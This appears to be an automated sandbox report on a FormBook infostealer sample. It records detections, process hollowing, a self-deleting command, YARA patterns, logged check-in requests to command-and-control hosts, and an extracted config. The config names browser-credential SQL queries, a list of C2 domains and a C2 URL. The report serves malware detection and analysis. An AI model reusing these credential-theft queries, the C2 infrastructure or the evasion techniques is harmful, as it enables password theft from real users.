Loading ...

Play interactive tourEdit tour

Analysis Report 74852.exe

Overview

General Information

Sample Name:74852.exe
Analysis ID:339342
MD5:e295cb54968cb6f3575a7caf32fe7f5a
SHA1:84405250603351ebe538e7ae34812704c0c3f480
SHA256:15198bfd2fbc367f07a22c6b39ea4e658dfea4a51b74cb4a653eb4b936ad3db0
Tags:exeGoDaddy

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 74852.exe (PID: 4604 cmdline: 'C:\Users\user\Desktop\74852.exe' MD5: E295CB54968CB6F3575A7CAF32FE7F5A)
    • 74852.exe (PID: 5884 cmdline: 'C:\Users\user\Desktop\74852.exe' MD5: E295CB54968CB6F3575A7CAF32FE7F5A)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Users\user\Desktop\74852.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d6c4", "CONFIG SIZE : 0xf1", "CONFIG OFFSET 0x1d7bf", "URL SIZE : 32", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc4fd7dc1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f714f28", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "lcwiremsh.com", "aliyunpan.host", "asiareddot.com", "russcrim.com", "onewithnature.store", "mypilot.net", "bonniebythebeach.com", "euvinarede.com", "xdbw688.com", "carbuyerforcashmorgantown.com", "dianna-ploss.com", "jbsolb.com", "homemademoneymaker.com", "m9wa.com", "westgatepaintedmountain.com", "bobbiejcochran.com", "templated.net", "xn--kasvomaskitnetist-6qb.com", "alliancefinancialgroupusa.com", "deungmaru.com", "memorialinsg.com", "theministrytofreedom.com", "wildtentz.com", "speak-prestige.info", "jlwebex.com", "arslanevdenevenakliyat.com", "olearestaurntgrp.com", "woleriutx.com", "iomola.com", "ozdisplay.com", "the-lookout.store", "psm-gen.com", "fishbitedogtreats.com", "safekillindia.com", "ifeelthevoice.com", "freefireturner.com", "cordialiving.com", "creplushealthplans.com", "pciappky.com", "bodyhousegr.com", "loanprogram.net", "robertnhenry.com", "claautogroup.com", "eternylyze.com", "bahsegel65.com", "tvory.net", "jaquesxpress.com", "tradcade.com", "lysander-hamburg.com", "borokish.com", "chromehygiene.com", "bliss2me.com", "truthaboutnickgordon.com", "blue-line-coffee.com", "baidu4.net", "remotelokal.com", "nazisrus.com", "xindedb.com", "happy-property.com", "villagora.com", "b8glpk11.xyz", "wingateofhouston.com", "colregistry.com", "api2088.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.theproducersagent.com/nf3n/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 7 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.74852.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.74852.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.74852.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        0.2.74852.exe.2fa0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.74852.exe.2fa0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: 74852.exeAvira: detected
          Found malware configurationShow sources
          Source: 0.2.74852.exe.2fa0000.2.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d6c4", "CONFIG SIZE : 0xf1", "CONFIG OFFSET 0x1d7bf", "URL SIZE : 32", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc4fd7dc1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f714f28", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: 74852.exeReversingLabs: Detection: 43%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 74852.exeJoe Sandbox ML: detected
          Source: 0.2.74852.exe.2fa0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.74852.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 74852.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 74852.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 74852.exe, 00000000.00000003.239671965.000000001C660000.00000004.00000001.sdmp, 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 74852.exe

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49757 -> 35.242.183.249:80
          Source: global trafficHTTP traffic detected: GET /nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA HTTP/1.1Host: www.pciappky.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.borokish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.wingateofhouston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: TEBYANIR TEBYANIR
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /nf3n/?P6A=BWH4JYaT58lXsf+hwUDxH06dhaR/NFiLUxB8VjbVPAJsYgbKUu72S4XTqnjrUaFuA8KvggDN6w==&-ZS=W6O4IjSXA HTTP/1.1Host: www.pciappky.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nf3n/?P6A=XF3ACZVZ0AFxpmcjv7zNQUKAsvnV4JVkDOgKKla4SX4XI6rXEfoV+gBXeaHQvMH/qTdtiOwxQg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.borokish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nf3n/?P6A=bFr0arjPDc1B3fljAhhQU4NpKn/qi+N2lxsYOk/PDiFBsnuAdXLBpwrG8B0Izk+nd97PpVoHHg==&-ZS=W6O4IjSXA HTTP/1.1Host: www.wingateofhouston.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.pciappky.com
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.260457732.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.271665329.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: 74852.exe, 00000000.00000002.244473079.000000000147A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
